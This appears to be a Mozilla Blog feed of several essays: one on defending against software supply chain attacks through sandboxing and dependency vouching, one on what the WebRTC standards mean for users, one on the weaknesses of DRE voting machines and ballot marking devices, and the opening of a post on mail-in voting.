The post Notes on Addressing Supply Chain Vulnerabilities appeared first on The Mozilla Blog.

]]>

Addressing Supply Chain Vulnerabilities

One of the unsung achievements of modern software development is the degree to which it has become componentized: not that long ago, when you wanted to write a piece of software you had to write pretty much the whole thing using whatever tools were provided by the language you were writing in, maybe with a few specialized libraries like OpenSSL. No longer. The combination of newer languages, Open Source development and easy-to-use package management systems like JavaScript’s npm or Rust’s Cargo/crates.io has revolutionized how people write software, making it standard practice to pull in third party libraries even for the simplest tasks; it’s not at all uncommon for programs to depend on hundreds or thousands of third party packages.

Supply Chain Attacks

While this new paradigm has revolutionized software development, it has also greatly increased the risk of supply chain attacks, in which an attacker compromises one of your dependencies and through that your software.[1] A famous example of this is provided by the 2018 compromise of the event-stream package to steal Bitcoin from people’s computers. The Register’s brief history provides a sense of the scale of the problem:

Ayrton Sparling, a computer science student at California State University, Fullerton (FallingSnow on GitHub), flagged the problem last week in a GitHub issues post. According to Sparling, a commit to the event-stream module added flatmap-stream as a dependency, which then included injection code targeting another package, ps-tree.

There are a number of ways in which an attacker might manage to inject malware into a package. In this case, what seems to have happened is that the original maintainer of event-stream was no longer working on it and someone else volunteered to take it over. Normally, that would be great, but here it seems that volunteer was malicious, so it’s not great.

Standards for Critical Packages

Recently, Eric Brewer, Rob Pike, Abhishek Arya, Anne Bertucio and Kim Lewandowski posted a proposal on the Google security blog for addressing vulnerabilities in Open Source software. They cover a number of issues including vulnerability management and security of compilation, and there’s a lot of good stuff here, but the part that has received the most attention is the suggestion that certain packages should be designated “critical”[2]:

For software that is critical to security, we need to agree on development processes that ensure sufficient review, avoid unilateral changes, and transparently lead to well-defined, verifiable official versions.

These are good development practices, and ones we follow here at Mozilla, so I certainly encourage people to adopt them. However, trying to require them for critical software seems like it will have some problems.

It creates friction for the package developer

One of the real benefits of this new model of software development is that it’s low friction: it’s easy to develop a library and make it available — you just write it put it up on a package repository like crates.io — and it’s easy to use those packages — you just add them to your build configuration. But then you’re successful and suddenly your package is widely used and gets deemed “critical” and now you have to put in place all kinds of new practices. It probably would be better if you did this, but what if you don’t? At this point your package is widely used — or it wouldn’t be critical — so what now?

It’s not enough

Even packages which are well maintained and have good development practices routinely have vulnerabilities. For example, Firefox recently released a new version that fixed a vulnerability in the popular ANGLE graphics engine, which is maintained by Google. Both Mozilla and Google follow the practices that this blog post recommends, but it’s just the case that people make mistakes. To (possibly mis)quote Steve Bellovin, “Software has bugs. Security-relevant software has security-relevant bugs”. So, while these practices are important to reduce the risk of vulnerabilities, we know they can’t eliminate them.

Of course this applies to inadvertent vulnerabilities, but what about malicious actors (though note that Brewer et al. observe that “Taking a step back, although supply-chain attacks are a risk, the vast majority of vulnerabilities are mundane and unintentional—honest errors made by well-intentioned developers.”)? It’s possible that some of their proposed changes (in particular forbidding anonymous authors) might have an impact here, but it’s really hard to see how this is actionable. What’s the standard for not being anonymous? That you have an e-mail address? A Web page? A DUNS number?[3] None of these seem particularly difficult for a dedicated attacker to fake and of course the more strict you make the requirements the more it’s a burden for the (vast majority) of legitimate developers.

I do want to acknowledge at this point that Brewer et al. clearly state that multiple layers of protection needed and that it’s necessary to have robust mechanisms for handling vulnerability defenses. I agree with all that, I’m just less certain about this particular piece.

Redefining Critical

Part of the difficulty here is that there are ways in which a piece of software can be “critical”:

  • It can do something which is inherently security sensitive (e.g., the OpenSSL SSL/TLS stack which is responsible for securing a huge fraction of Internet traffic).
  • It can be widely used (e.g., the Rust log) crate, but not inherently that sensitive.

The vast majority of packages — widely used or not — fall into the second category: they do something important but that isn’t security critical. Unfortunately, because of the way that software is generally built, this doesn’t matter: even when software is built out of a pile of small components, when they’re packaged up into a single program, each component has all the privileges that that program has. So, for instance, suppose you include a component for doing statistical calculations: if that component is compromised nothing stops it from opening up files on your disk and stealing your passwords or Bitcoins or whatever. This is true whether the compromise is due to an inadvertent vulnerability or malware injected into the package: a problem in any component compromises the whole system.[4] Indeed, minor non-security components make attractive targets because they may not have had as much scrutiny as high profile security components.

Least Privilege in Practice: Better Sandboxing

When looked at from this perspective, it’s clear that we have a technology problem: There’s no good reason for individual components to have this much power. Rather, they should only have the capabilities they need to do the job they are intended to to (the technical term is least privilege); it’s just that the software tools we have don’t do a good job of providing this property. This is a situation which has long been recognized in complicated pieces of software like Web browsers, which employ a technique called “process sandboxing” (pioneered by Chrome) in which the code that interacts with the Web site is run in its own “sandbox” and has limited abilities to interact with your computer. When it wants to do something that it’s not allowed to do, it talks to the main Web browser code and asks it to do it for it, thus allowing that code to enforce the rules without being exposed to vulnerabilities in the rest of the browser.

Process sandboxing is an important and powerful tool, but it’s a heavyweight one; it’s not practical to separate out every subcomponent of a large program into its own process. The good news is that there are several recent technologies which do allow this kind of fine-grained sandboxing, both based on WebAssembly. For WebAssembly programs, nanoprocesses allow individual components to run in their own sandbox with component-specific access control lists. More recently, we have been experimenting with a technology called called RLBox developed by researchers at UCSD, UT Austin, and Stanford which allows regular programs such as Firefox to run sandboxed components. The basic idea behind both of these is the same: use static compilation techniques to ensure that the component is memory-safe (i.e., cannot reach outside of itself to touch other parts of the program) and then give it only the capabilities it needs to do its job.

Techniques like this point the way to a scalable technical approach for protecting yourself from third party components: each component is isolated in its own sandbox and comes with a list of the capabilities that it needs (often called a manifest) with the compiler enforcing that it has no other capabilities (this is not too dissimilar from — but much more granular than — the permissions that mobile applications request). This makes the problem of including a new component much simpler because you can just look at the capabilities it requests, without needing verify that the code itself is behaving correctly.

Making Auditing Easier

While powerful, sandboxing itself — whether of the traditional process or WebAssembly variety — isn’t enough, for two reasons. First, the APIs that we have to work with aren’t sufficiently fine-grained. Consider the case of a component which is designed to let you open and process files on the disk; this necessarily needs to be able to open files, but what stops it from reading your Bitcoins instead of the files that the programmer wanted it to read? It might be possible to create a capability list that includes just reading certain files, but that’s not the API the operating system gives you, so now we need to invent something. There are a lot of cases like this, so things get complicated.

The second reason is that some components are critical because they perform critical functions. For instance, no matter how much you sandbox OpenSSL, you still have to worry about the fact that it’s handling your sensitive data, and so if compromised it might leak that. Fortunately, this class of critical components is smaller, but it’s non-zero.

This isn’t to say that sandboxing isn’t useful, merely that it’s insufficient. What we need is multiple layers of protection[5], with the first layer being procedural mechanisms to defend against code being compromised and the second layer being fine-grained sandboxing to contain the impact of compromise. As noted earlier, it seems problematic to put the burden of better processes on the developer of the component, especially when there are a large number of dependent projects, many of them very well funded.

Something we have been looking at internally at Mozilla is a way for those projects to tag the dependencies they use and depend on. The way that this would work is that each project would then be tagged with a set of other projects which used it (e.g., “Firefox uses this crate”). Then when you are considering using a component you could look to see who else uses it, which gives you some measure of confidence. Of course, you don’t know what sort of auditing those organizations do, but if you know that Project X is very security conscious and they use component Y, that should give you some level of confidence. This is really just a automating something that already happens informally: people judge components by who else uses them. There are some obvious extensions here, for instance labelling specific versions, having indications of what kind of auditing the depending project did, or allowing people to configure their build systems to automatically trust projects vouched for by some set of other projects and refuse to include unvouched projects, maintaining a database of insecure versions (this is something the Brewer et al. proposal suggests too). The advantage of this kind of approach is that it puts the burden on the people benefitting from a project, rather than having some widely used project suddenly subject to a whole pile of new requirements which they may not be interested in meeting. This work is still in the exploratory stages, so reach out to me if you’re interested.

Obviously, this only works if people actually do some kind of due diligence prior to depending on a component. Here at Mozilla, we do that to some extent, though it’s not really practical to review every line of code in a giant package like WebRTC There is some hope here as well: because modern languages such as Rust or Go are memory safe, it’s much easier to convince yourself that certain behaviors are impossible — even if the program has a defect — which makes it easier to audit.[6] Here too it’s possible to have clear manifests that describe what capabilities the program needs and verify (after some work) that those are accurate.

Summary

As I said at the beginning, Brewer et al. are definitely right to be worried about this kind of attack. It’s very convenient to be able to build on other people’s work, but the difficulty of ascertaining the quality of that work is an enormous problem[7]. Fortunately, we’re seeing a whole series of technological advancements that point the way to a solution without having to go back to the bad old days of writing everything yourself.


  1. Supply chain attacks can be mounted via a number of other mechanisms, but in this post, we are going to focus on this threat vector. ↩
  2. Where “critical” is defined by a somewhat complicated formula based roughly on the age of the project, how actively maintained it seems to be, how many other projects seem to use it, etc. It’s actually not clear to me that this is metric is that good a predictor of criticality; it seems mostly to have the advantage that it’s possible to evaluate purely by looking at the code repository, but presumably one could develop a metric that would be good. ↩
  3. Experience with TLS Extended Validation certificates, which attempt to verify company identity, suggests that this level of identity is straightforward to fake. ↩
  4. Allan Schiffman used to call this phenomenen a “distributed single point of failure”. ↩
  5. The technical term here is defense in depth. ↩
  6. Even better are verifiable systems such the HaCl* cryptographic library that Firefox depends on. HaCl* comes with a machine-checkable proof of correctness, which significantly reducing the need to audit all the code. Right now it’s only practical to do this kind of verification for relatively small programs, in large part because describing the specification that you are proving the program conforms to is hard, but the technology is rapidly getting better. ↩
  7. This is true even for basic quality reasons. Which of the two thousand ORMs for node is the best one to use? ↩

The post Notes on Addressing Supply Chain Vulnerabilities appeared first on The Mozilla Blog.

]]>
What WebRTC means for you https://blog.mozilla.org/en/mozilla/leadership/what-webrtc-means-for-you/ Thu, 04 Feb 2021 15:13:00 +0000 https://blog.mozilla.org/foxtail/?p=65243 If I told you that two weeks ago IETF and W3C finally published the standards for WebRTC, your response would probably be to ask what all those acronyms were. Read on to find out! Widely available high quality videoconferencing is one of the real successes of the Internet. The idea of videoconferencing is of course […]

The post What WebRTC means for you appeared first on The Mozilla Blog.

]]>

If I told you that two weeks ago IETF and W3C finally published the standards for WebRTC, your response would probably be to ask what all those acronyms were. Read on to find out!

Widely available high quality videoconferencing is one of the real successes of the Internet. The idea of videoconferencing is of course old (go watch that scene in 2001 where Heywood Floyd makes a video call to his family on a Bell videophone), but until fairly recently it required specialized equipment or at least downloading specialized software. Simply put, WebRTC is videoconferencing (VC) in a Web browser, with no download: you just go to a Web site and make a call. Most of the major VC services have a WebRTC version: this includes Google Meet, Cisco WebEx, and Microsoft Teams, plus a whole bunch of smaller players.

A toolkit, not a phone

WebRTC isn’t a complete videoconferencing system; it’s a set of tools built in to the browser that take care of many of the hard pieces of building a VC system so that you don’t have to. This includes:

  • Capturing the audio and video from the computer’s microphone and camera. This also includes what’s called Acoustic Echo Cancellation: removing echos (hopefully) even when people don’t wear headphones.
  • Allowing the two endpoints to negotiate their capabilities (e.g., “I want to send and receive video at 1080p using the AV1 codec”) and arrive at a common set of parameters.
  • Establishing a secure connection between you and other people on the call. This includes getting your data through any NATs or firewalls that may be on your network.
  • Compressing the audio and video for transmission to the other side and then reassembling it on receipt. It’s also necessary to deal with situations where some of the data is lost, in which case you want to avoid having the picture freeze or hearing audio glitches.

This functionality is embedded in what’s called an application programming interface (API): a set of commands that the programmer can give the browser to get it to set up a video call. The upshot of this is that it’s possible to write a very basic VC system in a very small number of lines of code. Building a production system is more work, but with WebRTC, the browser does much of the work of building the client side for you.

Standardization

Importantly, this functionality is all standardized: the API itself was published and by the World Wide Web Consortium(W3C) and the network protocols (encryption, compression, NAT traversal, etc.) were standardized by the Internet Engineering Task Force (IETF). The result is a giant pile of specifications, including the API specification, the protocol for negotiating what media will be sent or received, and a mechanism for sending peer-to-peer data. All in all, this represents a huge amount of work by too many people to count spanning a decade and resulting in hundreds of pages of specifications.

The result is that it’s possible to build a VC system that will work for everyone right in their browser and without them having to install any software

Ironically, the actual publication of the standards is kind of anticlimactic: every major browser has been shipping WebRTC for years and as I mentioned above, there are a large number of WebRTC VC systems. This is a good thing: widespread deployment is the only way to get confidence that technologies really work as expected and that the documents are clear enough to implement from. What the standards reflect is the collective judgement of the technical community that we have a system which generally works and that we’re not going to change the basic pieces. It also means that it’s time for VC providers who implemented non-standard mechanisms to update to what the standards say[1].

Why do you care about any of this?

At this point you might be thinking “OK, you all did a lot of work, but why does it matter? Can’t I just download Zoom? There are a number of important reasons why WebRTC is a big deal, as described below.

Security

Probably the most important reason is security. Because WebRTC runs entirely in the browser, it means that you don’t need to worry about security issues in the software that the VC provider wants you to download. As an example, last year Zoom had a number of high profile security flaws that would, for instance, have allowed web sites to add you to calls without your permission, or mount what’s called a Remote Code Execution attack that would allow attackers to run their code on your computer. By contrast, because WebRTC doesn’t require a download, you’re not exposed to whatever vulnerabilities the vendor may have in their client. Of course browsers don’t have a perfect security record, but every major browser invests a huge amount in security technologies like sandboxing. Moreover, you’re already running a browser, so every additional application you run increases your security risk. For this reason, Kaspersky recommends running the Zoom Web client, even though the experience is a lot worse than the app.[2]

The second security advantage of WebRTC-based conferencing is that the browser controls access to the camera and microphone. This means that you can easily prevent sites from using them, as well as be sure when they are in use. For instance, Firefox prompts you before letting a site use the camera and microphone and then shows something in the URL bar whenever they are live.

WebRTC is always encrypted in transit without the VC system having to do anything else, so you mostly don’t have to ask whether the vendor has done a good job with their encryption. This is one of the pieces of WebRTC that Mozilla was most involved in putting into place, in line with Mozilla Manifesto principle number 4 (Individuals’ security and privacy on the internet are fundamental and must not be treated as optional.). Even more exciting, we’re starting to see work on built-in end-to-end encrypted conferencing for WebRTC built on MLS and SFrame. This will help address the one major security feature that some native clients have that WebRTC does not provide: preventing the service from listening in on your calls. It’s good to see progress on that front.

Low Friction

Because WebRTC-based video calling apps work out of the box with a standard Web browser, they dramatically reduce friction. For users, this means they can just join a call without having to install anything, which makes life a lot easier. I’ve been on plenty of calls where someone couldn’t join — often because their company used a different VC system — because they hadn’t downloaded the right software, and this happens a lot less now that it just works with your browser. This can be an even bigger issue in enterprises have restrictions on what software can be installed.

For people who want to stand up a new VC service, WebRTC means that they don’t need to write a new piece of client software and get people to download it. This makes it much easier to enter the market without having to worry about users being locked into one VC system and unable to use yours.

None of this means that you can’t build your own client and a number of popular systems such as WebEx and Meet have downloadable endpoints (or, in the case of WebEx, hardware devices you can buy). But it means you don’t have to, and if you do things right, browser users will be able to talk to your custom endpoints, thus giving casual users an easy way to try out your service without being too committed.[3]

Enhancing The Web

Because WebRTC is part of the Web, not isolated into a separate app, that means that it can be used not just for conferencing applications but to enhance the Web itself. You want to add an audio stream to your game? Share your screen in a webinar? Upload video from your camera? No problem, just use WebRTC.

One exciting thing about WebRTC is that there turn out to be a lot of Web applications that can use WebRTC besides just video calling. Probably the most interesting is the use of WebRTC “Data Channels”, which allow a pair of clients to set up a connection between them which they can use to directly exchange data. This has a number of interesting applications, including gaming, file transfer, and even BitTorrent in the browser. It’s still early days, but I think we’re going to be seeing a lot of DataChannels in the future.

The bigger picture

By itself, WebRTC is a big step forward for the Web: it If you’d told people 20 years ago that they would be doing video calling from their browser, they would have laughed at you — and I have to admit, I was initially skeptical — and yet I do that almost every day at work. But more importantly, it’s a great example of the power the Web has to make to make people’s lives better and of what we can do when we work together to do that.


  1. Technical note: probably the biggest source of problems for Firefox users is people who implemented a Chrome-specific mechanism for handling multiple media streams called “Plan B”. The IETF eventually went with something called “Unified Plan” and Chrome supports it (as does Google Meet) but there are still a number of services, such as Slack and Facebook Video Calling, which do Plan B only which means they don’t work properly with Firefox, which implemented Unified Plan. ↩
  2. The Zoom Web client is an interesting case in that it’s only partly WebRTC. Unlike (say) Google Meet, Zoom Web uses WebRTC to capture audio and video and to transmit media over the network, but does all the audio and video locally using WebAssembly. It’s a testament to the power of WebAssembly that this works at all, but a head-to-head comparison of Zoom Web to other clients such as Meet or Jitsi reveals the advantages of using the WebRTC APIs built into the browser. ↩
  3. Google has open sourced their WebRTC stack, which makes it easier to write your own downloadable client, including one which will interoperate with browsers. ↩

The post What WebRTC means for you appeared first on The Mozilla Blog.

]]>
Why getting voting right is hard, Part V: DREs (spoiler: they’re bad) https://blog.mozilla.org/en/mozilla/leadership/why-getting-voting-right-is-hard-part-v-dres-spoiler-theyre-bad/ Thu, 21 Jan 2021 03:06:00 +0000 https://blog.mozilla.org/foxtail/?p=65212 This is the fifth post in my series on voting systems (catch up on parts I, II, III and IV), focusing on computerized voting machines. The technical term for these is Direct Recording Electronic (DRE) voting systems, but in practice what this means is that you vote on some kind of computer, typically using a […]

The post Why getting voting right is hard, Part V: DREs (spoiler: they’re bad) appeared first on The Mozilla Blog.

]]>
This is the fifth post in my series on voting systems (catch up on parts I, II, III and IV), focusing on computerized voting machines. The technical term for these is Direct Recording Electronic (DRE) voting systems, but in practice what this means is that you vote on some kind of computer, typically using a touch screen interface. As with precinct-count optical scan, the machine produces a total count, typically recorded on a memory card, printed out on a paper receipt-like tape, or both. These can be sent back to election headquarters, together with the ballots, where they are aggregated.

Accessibility

One of the major selling points of DREs is accessibility: paper ballots are difficult for people with a number of disabilities to access without assistance. At least in principle DREs can be made more accessible, for instance fitted with audio interfaces, sip-puff devices, etc. Another advantage of DREs is that they scale better to multiple languages: you of course still have to encode ballot definitions in each new language, but you don’t need to worry about whether you’ve printed enough ballot in any given language[1]

In practice, the accessibility of DREs is not that great:

Noel Runyan is one of the few people who sits at the crossroads of
this debate. He has 50 years of experience designing accessible
systems and is both a computer scientist and disabled. He was dragged
into this debate, he said, because there were so few other people who
had a stake in both fields.

Voting machines for all is clearly not the right position, Runyan
said. But neither is the universal requirement for hand-marked paper
ballots.

“The [Americans with Disabilities Act], Hava and decency require that
we allow disabled people to vote and have accessible voting systems,”
Runyan said.

Yet Runyan also believes the voting machines on the market today are
“garbage”. They neither provide any real sense of security against
physical or cyber-attacks that could alter an election, nor do they
have good user interfaces for voters regardless of disability status.

See also the 2007 California Top-to-Bottom-Review accessibility report for a long catalog of the failings of accessible voting systems at the time, which don’t seem to have improved much. With all that said, having any kind of accessiblity is a pretty big improvement. In particular, this was the first time that many visually impaired voters were able to vote without assistance.

DestroyingClarifying Voter Intent

As discussed in previous posts, one of the challenges with any kind of hand-marked ballot is dealing with edge cases where the markings are not clear and you have to discern voter intent. Arguments about how to interpret (or discard) these ambiguous ballots have been important in at least two very high stakes US elections, the 2000 Bush/Gore Florida Presidential contest (conducted on punch card machines) and the 2008 Coleman/Franken Minnesota Senate contest (conducted on optical scan machines). It’s traditional at this point to show the following picture of one of the “scrutineers” from the Florida recount trying to interpret a punch card ballot[2]:

In a DRE system, by contrast, all of the interpretation of voter intent is done by the computer, with the expectation that any misinterpretation will be caught by the voter checking the DRE’s work (typically at some summary screen before casting). In addition, the DRE can warn users about potential errors on their part (or just make them impossible by forbidding voters from voting for >1 candidate, etc.). To the extent to which voters actually check that the DRE is behaving correctly, this seems like an advantage, but if they do not (see below) then it’s just destroying information which might be used to conduct a more accurate election. We have trouble measuring the error rate of DREs in the field — again, because the errors are erased and because observing actual voters while casting ballots is a violation of ballot privacy and secrecy — but Michael Byrne reports that under laboratory conditions, DREs have comparable error rates (~1-2%) to hand-marked optical scan ballots, so this suggests that the outcome is about neutral.

Scalability

DREs have far worse scaling properties than optical scan systems. The number of voters that can vote at once is one of the main limits on how fast people can get through a polling place. Thus, you’d like to have as many voting stations as possible. However, DREs are expensive to buy (as well as to set up), so there’s pressure on the maximum number of machines. To make matters worse, you need more machines than you would expect by just calculating the total amount of time people need to vote.

The intuition here is that people don’t vote evenly throughout the day, so you need many more machines than you would need to handle the average arrival rate. For instance, if you expect to see 1200 voters over a 12 hour period and each voter takes 6 minutes to vote, you might think you could get by with 10 machines. However, what actually happens is that a lot of people vote before work, at lunch, and after work and so you get a line that builds up early, gradually dissipates throughout the morning, with a lot of machines standing idle, builds up again around lunch, then dissipates, and and then another long line that starts to build up around 5 PM. The math here is complicated, but roughly speaking you need about twice as many machines as you would expect to ensure that lines stay short. In addition, the problem gets worse when there is high turnout.

These problems exist to some extent with optical scan, but the main difference is that the voting stations — typically a table and a privacy shield — are cheap, so you can afford to have overcapacity. Moreover, if you really start getting backed up you can let voters fill out ballots on clipboards or whatever. This isn’t to say that there’s no way to get long lines with paper ballots; for instance, you could have problems at checkin or a backup at the precinct count scanner, but in general paper should be more resilient to high turnout than DREs. It’s also more resilient to failure: if the scanners fail, you can just have people cast ballots in a ballot box for later scanning. If the DREs fail, people can’t vote unless you have backup paper ballots.

Security

DREs are computers and as discussed in Part III, any kind of computerized voting is dangerous because computers can be compromised. This is especially dangerous in a DRE system because the computer completely controls the users experience: it can let the voter vote for Smith — and even show the voter that they voted for Smith — and then record a vote for Jones. In the most basic DRE system, this kind of fraud is essentially undetectable: you simply have to trust the computer. For obvious reasons, this is not good. To quote Richard Barnes, “for security people ‘trust’ is a bad word.”

How to compromise a voting machine

There are a number of ways in which a voting machine might get compromised. The simplest is that someone might with physical access might subvert it (for obvious[3] reasons, you don’t want voting machines to be networked, let alone connected to the Internet). The bad news is that — at least in the past — a number of studies of DREs have found it fairly easy to compromise DREs even with momentary access. For instance, in 2007, Feldman, Halderman, and Felten studied the Diebold AccuVote-TS and found that:

1. Malicious software running on a single voting machine can steal votes
with little if any risk of detection. The malicious software can modify
all of the records, audit logs, and counters kept by the voting machine,
so that even careful forensic examination of these records will find
nothing amiss. We have constructed demonstration software that carries
out this vote-stealing attack.

2. Anyone who has physical access to a voting machine, or to a memory
card that will later be inserted into a machine, can install said
malicious software using a simple method that takes as little as
one minute. In practice, poll workers and others often have
unsupervised access to the machines.

As I said in Part III, most of the work here was done in the 2000s, so it’s possible that things have improved, but the available evidence suggests otherwise. Moreover, there are limits to how good a job it seems possible to do here.

As with precinct-count machines, there are a number of ways in which an attacker might get enough physical access to the machine in order to attack them. Anyone who has access to the warehouse where the machines are stored could potentially tamper with them. In addition it’s not uncommon for voting machines to be stored overnight at polling places before the election, where you’re mostly relying on whatever lock the church or school or whatever has on its doors. It’s also not impossible that a voter could exploit temporary physical access to a machine in order to compromise it — remember that there usually will be a lot of machines in a given location so it’s hard to supervise them all — but that is a somewhat harder attack to mount.

Viral attacks

However, there is another more serious attack modality: device administration. Prior to each election, DREs need to be initialized with the ballot contents for each context. The details of how this is done vary, for instance one connect them via a cable to the Election Management System (EMS) [–corrected from “Server”], or insert a memory stick programmed by the EMS, or sometimes over a local network. In either case, this electronic connection is a potential avenue for attack by an attacker who controls the EMS. This connection can also be an opportunity for a compromised voting machine to attack the EMS. Together, these provide the potential conditions for a virus: an attacker compromises a single DRE and then uses that to attack the EMS, and then uses the EMS to attack every DRE in the jurisdiction. This has been demonstrated on real systems. Here’s Feldman et al. again:

3. AccuVote-TS machines are susceptible to voting-machine viruses—computer
viruses that can spread malicious software automatically and invisibly from
machine to machine during normal pre- and post-election activity. We have
constructed a demonstration virus that spreads in this way, installing our
demonstration vote-stealing program on every machine it infects.

It’s important to remember that this kind of attack is also potentially possible with precinct-count opscan machines: any time you have computers in the polling place you run this risk. The major difference is that with precinct-count opscan machines, you have the paper ballots available so you can recount them without trusting the computer.

Voter Verifiable Paper Audit Trails (VVPAT)

Because of this kind of concern, some DREs are fitted with what’s called a Voter Verifiable Paper Audit Trail (VVPAT). A typical VVPAT is a reel-to-reel thermal printer (think credit card receipts) behind a clear cover that is attached to the voting machine, as in the picture of a Hart voting machine below (the VVPAT is the grey box on the left). [Picture by Joseph Lorenzo Hall].

The typical way this works is that after the voter has made their selections they will be presented with a final confirmation screen. At the same time, the VVPAT will print out a summary of their choices which the voter can check. If they are correct, the voter accepts them. If not, they can go back and correct their choices, and then go back to the confirmation screen. The idea is that the VVPAT then becomes an untamperable — at least electronically — record of the voter’s choices and can be counted separately if there is some concern about the correctness of the machine tally. If everyone did this, then DREs with VVPAT would be software independent (recall our discussion of SI in Part III of this series).

The major problem with VVPATs is that voters make mistakes and they aren’t very good about checking the results. This means that a compromised machine can change the voter’s vote (as if the voter had made a mistake). If the voter doesn’t catch the mistake, then the attacker wins, and if they do, they’re allowed to correct the mistake.[4] We do have some data on this from Bernhard et al., who studied Ballot Marking Devices (BMDs), which are like DREs except that they print out optical scan ballots (see below). They found that if left to themselves around 6.5% of voters (in a simulated but realistic setting) will detect ballots being changed, which is pretty bad. There is some good news here, which is that with appropriate warnings by the “poll workers” the researchers were able to raise the detection rate to 85.7%, though it’s not clear how feasible it is to get poll workers to give those warnings.

Privacy/Secrecy of the Ballot

The DRE privacy/secrecy story is also somewhat disappointing. There are two main ways that the system can leak how a voter voted: via Cast Vote Records (CVRs) and via the VVPAT paper record. A CVR is just an electronic representation of a given voter’s ballot stored on the DRE’s “disk”. In principle, you might think that you could just store the totals for each contest, but it’s convenient to have CVRs around for a variety of reasons, including post-election analysis (looking for undervotes, possible tabulation errors, etc.) In any case, it’s common practice to record them and the Voluntary Voting Systems Guidelines (VVSG) promulgated by the US Election Assistance Commission encourage vendors to do so. This isn’t necessarily a problem if CVRs are handled correctly, but it must be impossible to link a CVR back to a voter. This means they have to be stored in a random order with no identifying marks that lead back to voter sequence. Historically, manufacturers have not always gotten this right, as, for instance, the California TTBR found (See Section 4.4.8 and Section 6.8). These problems can also exist with precinct count optical scan systems, but I forgot to mention it in my post on them. Sorry about that. Even if this part is done correctly, there are risks of pattern voting attacks in which the voter casts their ballot in a specific unique way, though again this can happen with optical scan.

The VVPAT also presents a problem. As described above, VVPATs are typically one long strip of paper, with the result that the VVPAT reflects the order in which votes were cast. An attacker who can observe the order in which voters voted and who also has access to the VVPAT can easily determine how each voter voted. This issue can be mostly mitigated with election procedures which cut the VVPAT roll apart prior to usage, but absent those procedures it represents a risk.

Ballot Marking Devices

The final thing I want to cover in this post is what’s called a Ballot Marking Device (BMD) [also known as an Electronic Ballot Marker (EBM)]. BMDs have gained popularity in recent years — especially with people from the computer science voting security community — as a design that tries to blend some of the good parts of DREs with some of the good parts of paper ballots. For example, the Voting Works open source machine design is an BMD, as is Los Angeles’s new VSAP machine.

A BMD is conceptually similar to DRE but with two important differences:

  1. It doesn’t have a VVPAT but instead prints out a ballot which can be fed into an optical scanner.
  2. Because the actual ballot counting is done by the scanner, you don’t need the machine to count votes, so it doesn’t need to store CVRs or maintain vote totals.

BMDs address the privacy issues with DREs fairly effectively: you don’t need to store CVRs in the machine and the ballots are to some extent randomized in the ballot boxes and handling process. They also partly address the scaling issues: while BMDs aren’t any cheaper, if a long line develops you can fall back to hand-marked optical scan ballots without disrupting any of your back-end processes.

It’s less clear that they address the security issues: a compromised BMD can cheat just as much as a compromised DRE and so they still rely on the voter checking their ballot. There have been some somewhat tricky attacks proposed on DREs where the attacker controls the printer in a way that fools the user about the VVPAT record and these can’t be mounted with a BMD, but it’s not clear how practical those attacks are in any case. Probably the biggest security advantage of a BMD is that you don’t need to worry about trusting the machine count or the communications channel back from the machine: you just count the opscan ballots without having to mess around with the VVPAT.[5] And of course because they’re fundamentally just a mechanism for printing paper ballots, it’s straightforward to fall back to paper in case of failure or long lines.

Up Next: Post-Election Audits

We’ve now covered all the major methods used for casting and counting votes. That’s just the beginning, though: if you want to have confidence in an election you need to be able to audit the results. That’s a topic that deserves its own post.


  1. For instance, Santa Clara county produces ballots in English, Chinese, Spanish, Tagalog, and Vietnamese, Hindi, Japanese, Khmer, and Korean. ↩
  2. Punch cards are an old system with some interesting properties. The voter marks their ballot by punching holes in a punch card. The card itself has no candidates written on it but is instead inserted into a holder that lists the contests and choices. The card itself is then read by a standard punch card reader. This seems like it ought to be fairly straightforward but went wrong in a number of ways in Florida due to a combination of poor ballot design and an unfortunate technical failure mode: it was possible to punch the cards incompletely and as the voting machine filled up with chads (the little pieces of paper that you punched out), it would sometimes become harder to punch the ballot completely. This resulted in a number of ballots which had partially detached (“hanging”) chads or just dimpled chads, leading to debates about how to interpret them. Wikipedia has a pretty good description of what happened here. ↩
  3. At least they should be obvious: It’s incredibly hard to write software that can resist compromise by a dedicated attacker who has direct access (this is why you have to keep upgrading your browser and operating system to fix security issues). Given the critical nature of voting machines, you really don’t want them attached to the Internet. ↩
  4. In principle, this might leave statistical artifacts, such as a higher rate of correcting from Smith -> Jones than Jones -> Smith, but it would take a fair amount of work to be sure that this wasn’t just random error. ↩
  5. We’ve touched on this a few times, but one of the real advantages of paper ballots is that they serve as a single common format for votes. Once you have that format, it’s possible to have multiple methods for writing (by hand, BMD) and reading (by hand, central count opscan, precinct count opscan) the ballots. That gives you increased flexibility because it means that you can innovate in one area without affecting others, as well as allowing either the writing side (voters) or reading side (election officials) to change its processes without affecting the other. This is a principle with applicability far beyond voting. Interoperable standardized data formats and protocols are a basic foundation of the Internet and the Web and much of what has made the rapid advancement of the Internet possible. ↩

The post Why getting voting right is hard, Part V: DREs (spoiler: they’re bad) appeared first on The Mozilla Blog.

]]>
Why getting voting right is hard, Part IV: Absentee Voting and Vote By Mail https://blog.mozilla.org/en/mozilla/why-getting-voting-right-is-hard-part-iv-absentee-voting-and-vote-by-mail/ Wed, 13 Jan 2021 23:32:00 +0000 https://blog.mozilla.org/foxtail/?p=64535 This is the fourth post in my series on voting systems. Part I covered requirements and then Part II and Part III covered in-person voting using paper ballots. However, paper ballots don’t need to be voted in person; it’s also possible to have people mail in their ballots, in which case they can be counted […]

The post Why getting voting right is hard, Part IV: Absentee Voting and Vote By Mail appeared first on The Mozilla Blog.

]]>

This is the fourth post in my series on voting systems. Part I covered requirements and then Part II and Part III covered in-person voting using paper ballots. However, paper ballots don’t need to be voted in person; it’s also possible to have people mail in their ballots, in which case they can be counted the same way as if they had been voted in person.

Mail-in ballots get used in two main ways:

  • Absentee Ballots: Inevitably, some voters will be unavailable on election day. Even with early voting, some voters (e.g., students, people living overseas, members of the military, people on travel, etc.) might be out of town for weeks or months. In many cases, some or all these voters are still eligible to vote in the jurisdiction in which they are nominally residents even if they aren’t physically present. The usual procedure is to mail them a ballot and let them mail it back in.
  • Vote By mail (VBM): Some jurisdictions (e.g., Oregon) have abandoned in-person voting entirely and mail every registered voter a ballot and have them mail it back.

From a technical perspective, absentee ballots and vote-by-mail work the same way; it’s just a matter of which sets of voters vote in person and which don’t. These lines also blur some in that some jurisdictions require a reason to vote absentee whereas some just allow anyone to request an absentee ballot (“no-excuse absentee”). Of course, in a vote-by-mail only jurisdiction then voters don’t need to take any action to get mailed a ballot. For convenience, I’ll mostly be referring to all of these procedures as mail-in ballots.

